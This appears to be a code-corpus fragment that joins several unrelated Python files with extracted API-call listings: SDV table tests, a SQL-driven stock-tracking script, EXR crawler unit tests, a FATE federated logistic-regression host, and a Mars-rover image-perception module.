(['table_mock', 'data', '"""drop"""'], {}), "(table_mock, data, 'drop')\n", (13733, 13759), False, 'from sdv.metadata import Table\n'), ((13804, 13856), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 1': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'item 1': [3, 4, 5]}, index=[0, 1, 2])\n", (13816, 13856), True, 'import pandas as pd\n'), ((14349, 14412), 'pandas.DataFrame', 'pd.DataFrame', (["{'a': [0, 1, 2], 'b': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'a': [0, 1, 2], 'b': [3, 4, 5]}, index=[0, 1, 2])\n", (14361, 14412), True, 'import pandas as pd\n'), ((14473, 14479), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (14477, 14479), False, 'from unittest.mock import Mock, patch\n'), ((14528, 14557), 'pandas.Series', 'pd.Series', (['[True, True, True]'], {}), '([True, True, True])\n', (14537, 14557), True, 'import pandas as pd\n'), ((14635, 14641), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (14639, 14641), False, 'from unittest.mock import Mock, patch\n'), ((14726, 14779), 'sdv.metadata.Table._validate_data_on_constraints', 'Table._validate_data_on_constraints', (['table_mock', 'data'], {}), '(table_mock, data)\n', (14761, 14779), False, 'from sdv.metadata import Table\n'), ((15330, 15393), 'pandas.DataFrame', 'pd.DataFrame', (["{'a': [0, 1, 2], 'b': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'a': [0, 1, 2], 'b': [3, 4, 5]}, index=[0, 1, 2])\n", (15342, 15393), True, 'import pandas as pd\n'), ((15454, 15460), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (15458, 15460), False, 'from unittest.mock import Mock, patch\n'), ((15509, 15539), 'pandas.Series', 'pd.Series', (['[True, False, True]'], {}), '([True, False, True])\n', (15518, 15539), True, 'import pandas as pd\n'), ((15617, 15623), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (15621, 15623), False, 'from unittest.mock import Mock, patch\n'), ((16248, 16311), 'pandas.DataFrame', 'pd.DataFrame', (["{'a': [0, 1, 2], 'b': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'a': [0, 1, 2], 'b': [3, 4, 5]}, index=[0, 1, 2])\n", (16260, 16311), True, 'import pandas as pd\n'), ((16372, 16378), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (16376, 16378), False, 'from unittest.mock import Mock, patch\n'), ((16461, 16467), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (16465, 16467), False, 'from unittest.mock import Mock, patch\n'), ((16552, 16605), 'sdv.metadata.Table._validate_data_on_constraints', 'Table._validate_data_on_constraints', (['table_mock', 'data'], {}), '(table_mock, data)\n', (16587, 16605), False, 'from sdv.metadata import Table\n'), ((5310, 5334), 'pytest.raises', 'pytest.raises', (['Exception'], {}), '(Exception)\n', (5323, 5334), False, 'import pytest\n'), ((5348, 5387), 'sdv.metadata.Table._prepare_constraints', 'Table._prepare_constraints', (['constraints'], {}), '(constraints)\n', (5374, 5387), False, 'from sdv.metadata import Table\n'), ((7081, 7106), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (7094, 7106), False, 'import pytest\n'), ((7120, 7149), 'sdv.metadata.Table._make_ids', 'Table._make_ids', (['metadata', '(20)'], {}), '(metadata, 20)\n', (7135, 7149), False, 'from sdv.metadata import Table\n'), ((12743, 12786), 'pytest.raises', 'pytest.raises', (['MissingConstraintColumnError'], {}), '(MissingConstraintColumnError)\n', (12756, 12786), False, 'import pytest\n'), ((12800, 12855), 'sdv.metadata.Table._transform_constraints', 'Table._transform_constraints', (['table_mock', 'data', '"""error"""'], {}), "(table_mock, data, 'error')\n", (12828, 12855), False, 'from sdv.metadata import Table\n'), ((15715, 15752), 'pytest.raises', 'pytest.raises', (['ConstraintsNotMetError'], {}), '(ConstraintsNotMetError)\n', (15728, 15752), False, 'import pytest\n'), ((15766, 15819), 'sdv.metadata.Table._validate_data_on_constraints', 'Table._validate_data_on_constraints', (['table_mock', 'data'], {}), '(table_mock, data)\n', (15801, 15819), False, 'from sdv.metadata import Table\n'), ((6851, 6877), 'pandas.Series', 'pd.Series', (["['a', 'b', 'c']"], {}), "(['a', 'b', 'c'])\n", (6860, 6877), True, 'import pandas as pd\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: <NAME>
import time
import sys
sys.path.append("..")
import database.db_operator as db_operator
import log.custom_logger as custom_logger
class GatherAllTrackingStocks:
    '''
    Aggregate and summarize all stocks that need to be tracked
    '''
    def __init__(self):
pass
def run_file_to_gather_all_tracking_stocks(self):
        # Run the query script.
        # Relative paths are resolved against the directory the command is executed from:
        # ./ means the current working directory, not the directory containing this script.
with open("../data_miner/sql_query/gather_all_tracking_stocks_query.sql", encoding='utf-8', mode='r') as f:
            # Read the whole SQL file,
            # split it into individual statements, and execute them one by one
sql_list = f.read().split(';')[:-1]
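            # Caveat: this naive split breaks on statements that contain a
            # literal ';' inside a string value.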
for x in sql_list:
                # If the statement contains line breaks,
if '\n' in x:
                    # replace each line break with a single space
x = x.replace('\n', ' ')
                # When there are redundant spaces,
if ' ' in x:
                    # replace them with nothing
x = x.replace(' ', '')
                # re-append the terminating semicolon to the SQL statement
inserting_sql = x + ';'
try:
db_operator.DBOperator().operate("insert", "target_pool", inserting_sql)
except Exception as e:
                    # Log the failure
                    msg = 'Failed: could not insert the historical index valuation info into the index_components_historical_estimations table of the aggregated_data database' + ' ' + str(
                        e)
custom_logger.CustomLogger().log_writter(msg, 'error')
def main(self):
self.run_file_to_gather_all_tracking_stocks()
if __name__ == '__main__':
time_start = time.time()
go = GatherAllTrackingStocks()
go.main()
time_end = time.time()
print('Time Cost: ' + str(time_end - time_start))
|
[
"sys.path.append",
"log.custom_logger.CustomLogger",
"database.db_operator.DBOperator",
"time.time"
] |
[((90, 111), 'sys.path.append', 'sys.path.append', (['""".."""'], {}), "('..')\n", (105, 111), False, 'import sys\n'), ((1566, 1577), 'time.time', 'time.time', ([], {}), '()\n', (1575, 1577), False, 'import time\n'), ((1642, 1653), 'time.time', 'time.time', ([], {}), '()\n', (1651, 1653), False, 'import time\n'), ((1081, 1105), 'database.db_operator.DBOperator', 'db_operator.DBOperator', ([], {}), '()\n', (1103, 1105), True, 'import database.db_operator as db_operator\n'), ((1391, 1419), 'log.custom_logger.CustomLogger', 'custom_logger.CustomLogger', ([], {}), '()\n', (1417, 1419), True, 'import log.custom_logger as custom_logger\n')]
|
import os
import unittest
import glob
from ....BaseTestCase import BaseTestCase
from centipede.Crawler import Crawler
from centipede.PathHolder import PathHolder
from centipede.Crawler.Fs.Image import Exr
class ExrTest(BaseTestCase):
"""Test Exr crawler."""
__exrFile = os.path.join(BaseTestCase.dataDirectory(), "test.exr")
__exrSeq = os.path.join(BaseTestCase.dataDirectory(), "testSeq.0001.exr")
__exrAmbiguousSeq = os.path.join(BaseTestCase.dataDirectory(), "test_0001.exr")
def testExrCrawler(self):
"""
        Test that the Exr crawler detection works properly.
"""
crawler = Crawler.create(PathHolder(self.__exrFile))
self.assertIsInstance(crawler, Exr)
crawler = Crawler.create(PathHolder(BaseTestCase.dataDirectory()))
self.assertNotIsInstance(crawler, Exr)
def testExrVariables(self):
"""
Test that variables are set properly.
"""
crawler = Crawler.create(PathHolder(self.__exrFile))
self.assertEqual(crawler.var("type"), "exr")
self.assertEqual(crawler.var("category"), "image")
self.assertEqual(crawler.var("imageType"), "single")
def testExrWidthHeight(self):
"""
Test that width and height variables are processed properly.
"""
crawler = Crawler.create(PathHolder(self.__exrFile))
self.assertNotIn("width", crawler.varNames())
self.assertNotIn("height", crawler.varNames())
self.assertEqual(crawler.var("width"), 1828)
self.assertEqual(crawler.var("height"), 1556)
def testImageSequence(self):
"""
Test that detection of an image sequence works properly.
"""
crawler = Crawler.create(PathHolder(self.__exrFile))
self.assertFalse(crawler.isSequence())
crawler = Crawler.create(PathHolder(self.__exrSeq))
self.assertTrue(crawler.isSequence())
crawler = Crawler.create(PathHolder(self.__exrAmbiguousSeq))
self.assertTrue(crawler.isSequence())
def testImageSequenceVariables(self):
"""
Test that the image sequence related variables are set properly.
"""
crawler = Crawler.create(PathHolder(self.__exrSeq))
self.assertEqual(crawler.var("imageType"), "sequence")
self.assertEqual(crawler.var("name"), "testSeq")
self.assertEqual(crawler.var("frame"), 1)
self.assertEqual(crawler.var("padding"), 4)
crawler = Crawler.create(PathHolder(self.__exrAmbiguousSeq))
self.assertEqual(crawler.var("imageType"), "sequence")
self.assertEqual(crawler.var("name"), "test")
self.assertEqual(crawler.var("frame"), 1)
self.assertEqual(crawler.var("padding"), 4)
def testImageSequenceGroup(self):
"""
Test that an image sequence is grouped properly.
"""
paths = glob.glob("{}/testSeq.*.exr".format(self.dataDirectory()))
crawlers = list(map(lambda x: Crawler.create(PathHolder(x)), paths))
crawlers.append(Crawler.create(PathHolder(self.__exrFile)))
grouped = Exr.group(crawlers)
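        # Exr.group collapses the sequence frames into a single group and keeps
        # the standalone exr file in a group of its own.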
self.assertEqual(len(grouped), 2)
self.assertEqual(len(grouped[0]), len(paths))
self.assertEqual(len(grouped[1]), 1)
groupedPaths = list(map(lambda x: x.var("filePath"), grouped[0]))
self.assertEqual(groupedPaths, sorted(paths))
self.assertEqual(grouped[1][0].var("filePath"), self.__exrFile)
reversedGrouped = Exr.sortGroup(grouped, lambda x: x.var('filePath'), True)
reversedPaths = list(map(lambda x: x.var("filePath"), reversedGrouped[0]))
self.assertEqual(reversedPaths, sorted(paths, reverse=True))
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"centipede.PathHolder.PathHolder",
"centipede.Crawler.Fs.Image.Exr.group"
] |
[((3726, 3741), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3739, 3741), False, 'import unittest\n'), ((3096, 3115), 'centipede.Crawler.Fs.Image.Exr.group', 'Exr.group', (['crawlers'], {}), '(crawlers)\n', (3105, 3115), False, 'from centipede.Crawler.Fs.Image import Exr\n'), ((640, 666), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrFile'], {}), '(self.__exrFile)\n', (650, 666), False, 'from centipede.PathHolder import PathHolder\n'), ((970, 996), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrFile'], {}), '(self.__exrFile)\n', (980, 996), False, 'from centipede.PathHolder import PathHolder\n'), ((1332, 1358), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrFile'], {}), '(self.__exrFile)\n', (1342, 1358), False, 'from centipede.PathHolder import PathHolder\n'), ((1732, 1758), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrFile'], {}), '(self.__exrFile)\n', (1742, 1758), False, 'from centipede.PathHolder import PathHolder\n'), ((1840, 1865), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrSeq'], {}), '(self.__exrSeq)\n', (1850, 1865), False, 'from centipede.PathHolder import PathHolder\n'), ((1946, 1980), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrAmbiguousSeq'], {}), '(self.__exrAmbiguousSeq)\n', (1956, 1980), False, 'from centipede.PathHolder import PathHolder\n'), ((2201, 2226), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrSeq'], {}), '(self.__exrSeq)\n', (2211, 2226), False, 'from centipede.PathHolder import PathHolder\n'), ((2483, 2517), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrAmbiguousSeq'], {}), '(self.__exrAmbiguousSeq)\n', (2493, 2517), False, 'from centipede.PathHolder import PathHolder\n'), ((3049, 3075), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrFile'], {}), '(self.__exrFile)\n', (3059, 3075), False, 'from centipede.PathHolder import PathHolder\n'), ((2986, 2999), 'centipede.PathHolder.PathHolder', 'PathHolder', (['x'], {}), '(x)\n', (2996, 2999), False, 'from centipede.PathHolder import PathHolder\n')]
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from arch.api import federation
from arch.api.utils import log_utils
from federatedml.logistic_regression.hetero_logistic_regression.hetero_lr_base import HeteroLRBase
from federatedml.optim.gradient import HeteroLogisticGradient
from federatedml.secureprotol import EncryptModeCalculator
from federatedml.statistic.data_overview import rubbish_clear
from federatedml.util import consts
from federatedml.statistic import data_overview
LOGGER = log_utils.getLogger()
class HeteroLRHost(HeteroLRBase):
def __init__(self):
super(HeteroLRHost, self).__init__()
self.batch_num = None
self.batch_index_list = []
self.role = consts.HOST
def compute_forward(self, data_instances, coef_, intercept_, batch_index=-1):
"""
Compute W * X + b and (W * X + b)^2, where X is the input data, W is the coefficient of lr,
        and b is the intercept
Parameters
----------
data_instances: DTable of Instance, input data
coef_: list, coefficient of lr
        intercept_: float, the intercept of lr
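        batch_index: int, index of the current mini-batch, used to pick the matching encrypt-mode calculator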
"""
wx = self.compute_wx(data_instances, coef_, intercept_)
en_wx = self.encrypted_calculator[batch_index].encrypt(wx)
wx_square = wx.mapValues(lambda v: np.square(v))
en_wx_square = self.encrypted_calculator[batch_index].encrypt(wx_square)
host_forward = en_wx.join(en_wx_square, lambda wx, wx_square: (wx, wx_square))
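        # Both [[wx]] and [[wx^2]] are shipped to the guest, which needs the squared
        # term for its (Taylor-approximated) loss computation on encrypted values.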
# temporary resource recovery and will be removed in the future
rubbish_list = [wx,
en_wx,
wx_square,
en_wx_square
]
rubbish_clear(rubbish_list)
return host_forward
def fit(self, data_instances):
"""
Train lr model of role host
Parameters
----------
data_instances: DTable of Instance, input data
"""
LOGGER.info("Enter hetero_lr host")
self._abnormal_detection(data_instances)
self.header = self.get_header(data_instances)
public_key = federation.get(name=self.transfer_variable.paillier_pubkey.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.paillier_pubkey),
idx=0)
LOGGER.info("Get public_key from arbiter:{}".format(public_key))
self.encrypt_operator.set_public_key(public_key)
batch_info = federation.get(name=self.transfer_variable.batch_info.name,
tag=self.transfer_variable.generate_transferid(self.transfer_variable.batch_info),
idx=0)
LOGGER.info("Get batch_info from guest:" + str(batch_info))
self.batch_size = batch_info["batch_size"]
self.batch_num = batch_info["batch_num"]
if self.batch_size < consts.MIN_BATCH_SIZE and self.batch_size != -1:
raise ValueError(
"Batch size get from guest should not less than 10, except -1, batch_size is {}".format(
self.batch_size))
self.encrypted_calculator = [EncryptModeCalculator(self.encrypt_operator,
self.encrypted_mode_calculator_param.mode,
self.encrypted_mode_calculator_param.re_encrypted_rate) for _
in range(self.batch_num)]
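        # One EncryptModeCalculator per mini-batch (hence batch_num of them), so
        # re-encryption bookkeeping is kept separate for each batch.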
LOGGER.info("Start initialize model.")
model_shape = self.get_features_shape(data_instances)
if self.init_param_obj.fit_intercept:
self.init_param_obj.fit_intercept = False
if self.fit_intercept:
self.fit_intercept = False
self.coef_ = self.initializer.init_model(model_shape, init_params=self.init_param_obj)
self.n_iter_ = 0
index_data_inst_map = {}
while self.n_iter_ < self.max_iter:
LOGGER.info("iter:" + str(self.n_iter_))
batch_index = 0
while batch_index < self.batch_num:
LOGGER.info("batch:{}".format(batch_index))
# set batch_data
if len(self.batch_index_list) < self.batch_num:
batch_data_index = federation.get(name=self.transfer_variable.batch_data_index.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.batch_data_index, self.n_iter_,
batch_index),
idx=0)
LOGGER.info("Get batch_index from Guest")
self.batch_index_list.append(batch_data_index)
else:
batch_data_index = self.batch_index_list[batch_index]
# Get mini-batch train data
if len(index_data_inst_map) < self.batch_num:
batch_data_inst = batch_data_index.join(data_instances, lambda g, d: d)
index_data_inst_map[batch_index] = batch_data_inst
else:
batch_data_inst = index_data_inst_map[batch_index]
LOGGER.info("batch_data_inst size:{}".format(batch_data_inst.count()))
# transforms features of raw input 'batch_data_inst' into more representative features 'batch_feat_inst'
batch_feat_inst = self.transform(batch_data_inst)
# compute forward
host_forward = self.compute_forward(batch_feat_inst, self.coef_, self.intercept_, batch_index)
federation.remote(host_forward,
name=self.transfer_variable.host_forward_dict.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.host_forward_dict,
self.n_iter_,
batch_index),
role=consts.GUEST,
idx=0)
LOGGER.info("Remote host_forward to guest")
# compute host gradient
fore_gradient = federation.get(name=self.transfer_variable.fore_gradient.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.fore_gradient, self.n_iter_, batch_index),
idx=0)
LOGGER.info("Get fore_gradient from guest")
if self.gradient_operator is None:
self.gradient_operator = HeteroLogisticGradient(self.encrypt_operator)
host_gradient = self.gradient_operator.compute_gradient(batch_feat_inst, fore_gradient,
fit_intercept=False)
                # regularization if necessary
if self.updater is not None:
loss_regular = self.updater.loss_norm(self.coef_)
en_loss_regular = self.encrypt_operator.encrypt(loss_regular)
federation.remote(en_loss_regular,
name=self.transfer_variable.host_loss_regular.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.host_loss_regular,
self.n_iter_,
batch_index),
role=consts.GUEST,
idx=0)
LOGGER.info("Remote host_loss_regular to guest")
federation.remote(host_gradient,
name=self.transfer_variable.host_gradient.name,
tag=self.transfer_variable.generate_transferid(self.transfer_variable.host_gradient,
self.n_iter_,
batch_index),
role=consts.ARBITER,
idx=0)
LOGGER.info("Remote host_gradient to arbiter")
# Get optimize host gradient and update model
optim_host_gradient = federation.get(name=self.transfer_variable.host_optim_gradient.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.host_optim_gradient, self.n_iter_,
batch_index),
idx=0)
LOGGER.info("Get optim_host_gradient from arbiter")
LOGGER.info("update_model")
self.update_model(optim_host_gradient)
# update local model that transforms features of raw input 'batch_data_inst'
training_info = {"iteration": self.n_iter_, "batch_index": batch_index}
self.update_local_model(fore_gradient, batch_data_inst, self.coef_, **training_info)
batch_index += 1
# temporary resource recovery and will be removed in the future
rubbish_list = [host_forward,
fore_gradient
]
data_overview.rubbish_clear(rubbish_list)
is_stopped = federation.get(name=self.transfer_variable.is_stopped.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.is_stopped, self.n_iter_, batch_index),
idx=0)
LOGGER.info("Get is_stop flag from arbiter:{}".format(is_stopped))
self.n_iter_ += 1
if is_stopped:
LOGGER.info("Get stop signal from arbiter, model is converged, iter:{}".format(self.n_iter_))
break
LOGGER.info("Reach max iter {}, train model finish!".format(self.max_iter))
def predict(self, data_instances):
"""
Prediction of lr
Parameters
----------
        data_instances: DTable of Instance, input data
"""
LOGGER.info("Start predict ...")
data_features = self.transform(data_instances)
prob_host = self.compute_wx(data_features, self.coef_, self.intercept_)
federation.remote(prob_host,
name=self.transfer_variable.host_prob.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.host_prob),
role=consts.GUEST,
idx=0)
LOGGER.info("Remote probability to Guest")
|
[
"arch.api.utils.log_utils.getLogger",
"numpy.square",
"federatedml.statistic.data_overview.rubbish_clear",
"federatedml.optim.gradient.HeteroLogisticGradient",
"federatedml.secureprotol.EncryptModeCalculator"
] |
[((1082, 1103), 'arch.api.utils.log_utils.getLogger', 'log_utils.getLogger', ([], {}), '()\n', (1101, 1103), False, 'from arch.api.utils import log_utils\n'), ((2325, 2352), 'federatedml.statistic.data_overview.rubbish_clear', 'rubbish_clear', (['rubbish_list'], {}), '(rubbish_list)\n', (2338, 2352), False, 'from federatedml.statistic.data_overview import rubbish_clear\n'), ((3846, 3999), 'federatedml.secureprotol.EncryptModeCalculator', 'EncryptModeCalculator', (['self.encrypt_operator', 'self.encrypted_mode_calculator_param.mode', 'self.encrypted_mode_calculator_param.re_encrypted_rate'], {}), '(self.encrypt_operator, self.\n encrypted_mode_calculator_param.mode, self.\n encrypted_mode_calculator_param.re_encrypted_rate)\n', (3867, 3999), False, 'from federatedml.secureprotol import EncryptModeCalculator\n'), ((1904, 1916), 'numpy.square', 'np.square', (['v'], {}), '(v)\n', (1913, 1916), True, 'import numpy as np\n'), ((10424, 10465), 'federatedml.statistic.data_overview.rubbish_clear', 'data_overview.rubbish_clear', (['rubbish_list'], {}), '(rubbish_list)\n', (10451, 10465), False, 'from federatedml.statistic import data_overview\n'), ((7519, 7564), 'federatedml.optim.gradient.HeteroLogisticGradient', 'HeteroLogisticGradient', (['self.encrypt_operator'], {}), '(self.encrypt_operator)\n', (7541, 7564), False, 'from federatedml.optim.gradient import HeteroLogisticGradient\n')]
|
import numpy as np
import cv2
# Identify pixels above the threshold
# Threshold of RGB > 160 does a nice job of identifying ground pixels only
def color_thresh(img, rgb_thresh=(160, 160, 160),above = True):
# Create an array of zeros same xy size as img, but single channel
color_select = np.zeros_like(img[:,:,0])
# Require that each pixel be above all three threshold values in RGB
# above_thresh will now contain a boolean array with "True"
# where threshold was met
above_thresh = (img[:,:,0] > rgb_thresh[0]) \
& (img[:,:,1] > rgb_thresh[1]) \
& (img[:,:,2] > rgb_thresh[2])
below_thresh = (img[:,:,0] < rgb_thresh[0]) \
& (img[:,:,1] < rgb_thresh[1]) \
& (img[:,:,2] < rgb_thresh[2])
# Index the array of zeros with the boolean array and set to 1
if above:
color_select[above_thresh] = 1
else:
color_select[below_thresh] = 1
# Return the binary image
return color_select
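# Usage sketch (illustrative): given a camera frame `img`,
#   navigable = color_thresh(img)               # bright ground pixels
#   obstacles = color_thresh(img, above=False)  # darker obstacle pixels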
# Identify pixels within a range of threshold
# The default range does a nice job of picking out the yellow rock samples
def color_thresh_range(img, rgb_thresh_max=(255, 255, 80), rgb_thresh_min=(140, 110, 0)):
# Create an array of zeros same xy size as img, but single channel
color_select = np.zeros_like(img[:,:,0])
# Require that each pixel be above all three threshold values in RGB
# above_thresh will now contain a boolean array with "True"
# where threshold was met
thresh = (img[:,:,0] > rgb_thresh_min[0]) \
& (img[:,:,1] > rgb_thresh_min[1]) \
& (img[:,:,2] > rgb_thresh_min[2]) \
& (img[:,:,0] < rgb_thresh_max[0]) \
& (img[:,:,1] < rgb_thresh_max[1]) \
& (img[:,:,2] < rgb_thresh_max[2])
# Index the array of zeros with the boolean array and set to 1
color_select[thresh] = 1
# Return the binary image
return color_select
# Define a function to convert from image coords to rover coords
def rover_coords(binary_img):
# Identify nonzero pixels
ypos, xpos = binary_img.nonzero()
# Calculate pixel positions with reference to the rover position being at the
# center bottom of the image.
    x_pixel = -(ypos - binary_img.shape[0]).astype(float)
    y_pixel = -(xpos - binary_img.shape[1]/2).astype(float)
return x_pixel, y_pixel
# Define a function to convert to radial coords in rover space
def to_polar_coords(x_pixel, y_pixel):
# Convert (x_pixel, y_pixel) to (distance, angle)
# in polar coordinates in rover space
# Calculate distance to each pixel
dist = np.sqrt(x_pixel**2 + y_pixel**2)
# Calculate angle away from vertical for each pixel
angles = np.arctan2(y_pixel, x_pixel)
return dist, angles
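# Worked example (illustrative): a pixel at rover-centric (x, y) = (3, 4) gives
# dist = (3**2 + 4**2)**0.5 = 5.0 and angles = arctan2(4, 3) ~= 0.927 rad,
# i.e. about 53 degrees to the left of the rover's heading.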
# Define a function to map rover space pixels to world space
def rotate_pix(xpix, ypix, yaw):
# Convert yaw to radians
yaw_rad = yaw * np.pi / 180
xpix_rotated = (xpix * np.cos(yaw_rad)) - (ypix * np.sin(yaw_rad))
ypix_rotated = (xpix * np.sin(yaw_rad)) + (ypix * np.cos(yaw_rad))
# Return the result
return xpix_rotated, ypix_rotated
def translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale):
# Apply a scaling and a translation
xpix_translated = (xpix_rot / scale) + xpos
ypix_translated = (ypix_rot / scale) + ypos
# Return the result
return xpix_translated, ypix_translated
# Define a function to apply rotation and translation (and clipping)
# Once you define the two functions above this function should work
def pix_to_world(xpix, ypix, xpos, ypos, yaw, world_size, scale):
# Apply rotation
xpix_rot, ypix_rot = rotate_pix(xpix, ypix, yaw)
# Apply translation
xpix_tran, ypix_tran = translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale)
# Perform rotation, translation and clipping all at once
x_pix_world = np.clip(np.int_(xpix_tran), 0, world_size - 1)
y_pix_world = np.clip(np.int_(ypix_tran), 0, world_size - 1)
# Return the result
return x_pix_world, y_pix_world
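# Worked example (illustrative): with yaw=90, scale=10 and (xpos, ypos)=(50, 50),
# a rover pixel (10, 0) rotates to (0, 10), translates to (50.0, 51.0), and
# np.int_ plus np.clip bound it to world-map cell (50, 51).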
def get_sub_global_map(xpos, ypos, yaw, world_map, world_size, global_scale):
# Apply rotation
xpix = np.tile(np.arange(global_scale),global_scale)
ypix = np.repeat(np.arange(global_scale)-global_scale/2, global_scale)
xpix_rot, ypix_rot = rotate_pix(xpix, ypix, yaw)
# Apply translation
xpix_tran, ypix_tran = translate_pix(xpix_rot, ypix_rot, xpos, ypos, 1)
# Perform rotation, translation and clipping all at once
x_pix_world = np.clip(np.int_(xpix_tran), 0, world_size - 1)
y_pix_world = np.clip(np.int_(ypix_tran), 0, world_size - 1)
weights = world_map[y_pix_world, x_pix_world,:]
# Return the result
return xpix, ypix, weights
# Define a function to perform a perspective transform
def perspect_transform(img, src, dst):
M = cv2.getPerspectiveTransform(src, dst)
warped = cv2.warpPerspective(img, M, (img.shape[1], img.shape[0]))# keep same size as input image
return warped
# Apply the above functions in succession and update the Rover state accordingly
def perception_step(Rover):
# Perform perception steps to update Rover()
# TODO:
# NOTE: camera image is coming to you in Rover.img
img = Rover.img
# 1) Define source and destination points for perspective transform
source = np.float32([[14, 140], [301 ,140],[200, 96], [118, 96]])
dst_size = 5
bottom_offset = 6
destination = np.float32([[img.shape[1]/2 - dst_size, img.shape[0] - bottom_offset],
[img.shape[1]/2 + dst_size, img.shape[0] - bottom_offset],
[img.shape[1]/2 + dst_size, img.shape[0] - 2*dst_size - bottom_offset],
[img.shape[1]/2 - dst_size, img.shape[0] - 2*dst_size - bottom_offset],
])
# 2) Apply perspective transform
warped = perspect_transform(img, source, destination)
# 3) Apply color threshold to identify navigable terrain/obstacles/rock samples
threshed = color_thresh(warped)
# 4) Update Rover.vision_image (this will be displayed on left side of screen)
# Example: Rover.vision_image[:,:,0] = obstacle color-thresholded binary image
# Rover.vision_image[:,:,1] = rock_sample color-thresholded binary image
# Rover.vision_image[:,:,2] = navigable terrain color-thresholded binary image
Rover.vision_image[:,:, 0] = threshed
# 5) Convert map image pixel values to rover-centric coords
xpix, ypix = rover_coords(threshed)
# 6) Convert rover-centric pixel values to world coordinates
xpos = Rover.pos[0]
ypos = Rover.pos[1]
yaw = Rover.yaw
world_size = 200
scale = 10
x_pix_world, y_pix_world = pix_to_world(xpix, ypix, xpos, ypos, yaw, world_size, scale)
# 7) Update Rover worldmap (to be displayed on right side of screen)
# Example: Rover.worldmap[obstacle_y_world, obstacle_x_world, 0] += 1
# Rover.worldmap[rock_y_world, rock_x_world, 1] += 1
# Rover.worldmap[navigable_y_world, navigable_x_world, 2] += 1
Rover.worldmap[y_pix_world, x_pix_world, 2] = np.clip(Rover.worldmap[y_pix_world, x_pix_world, 2]+1,0,255)
threshed = color_thresh(warped, above = False)
xpix_obs, ypix_obs = rover_coords(threshed)
x_pix_world_obs, y_pix_world_obs = pix_to_world(xpix_obs, ypix_obs, xpos, ypos, yaw, world_size, scale)
Rover.worldmap[y_pix_world_obs, x_pix_world_obs, 0] = np.clip(Rover.worldmap[y_pix_world_obs, x_pix_world_obs, 0]+1,0,255)
threshed = color_thresh_range(warped)
xpix_rock, ypix_rock = rover_coords(threshed)
x_pix_world_rock, y_pix_world_rock = pix_to_world(xpix_rock, ypix_rock, xpos, ypos, yaw, world_size, scale)
Rover.worldmap[y_pix_world_rock, x_pix_world_rock, 1] = np.clip(Rover.worldmap[y_pix_world_rock, x_pix_world_rock, 1]+1,0,255)
# 8) Convert rover-centric pixel positions to polar coordinates
# Update Rover pixel distances and angles
# Rover.nav_dists = rover_centric_pixel_distances
# Rover.nav_angles = rover_centric_angles
dist, angles = to_polar_coords(xpix, ypix)
Rover.nav_dists = dist
Rover.nav_angles = angles
global_scale = 30
xpix_sub_global, ypix_sub_global, weights_sub_global = get_sub_global_map(xpos, ypos, yaw, Rover.worldmap, world_size, global_scale)
sub_global_map = weights_sub_global.reshape((global_scale,global_scale,3))
dis_sub_global, angles_sub_global = to_polar_coords(xpix_sub_global, ypix_sub_global)
weights_sub_global = (255-np.abs(weights_sub_global[:,0]+weights_sub_global[:,2]))/255
weights_sub_global[weights_sub_global<0.95] = 0
if np.mean(weights_sub_global) == 0:
mean_dir_sub_global = 0
elif np.mean(weights_sub_global) > 1:
mean_dir_sub_global = 0
else:
mean_dir_sub_global = np.sum(np.multiply(angles_sub_global,weights_sub_global))/np.sum(weights_sub_global)
Rover.dir_global = mean_dir_sub_global
return Rover
|
[
"cv2.warpPerspective",
"numpy.zeros_like",
"numpy.arctan2",
"numpy.int_",
"numpy.abs",
"numpy.sum",
"cv2.getPerspectiveTransform",
"numpy.multiply",
"numpy.float32",
"numpy.clip",
"numpy.mean",
"numpy.arange",
"numpy.sin",
"numpy.cos",
"numpy.sqrt"
] |
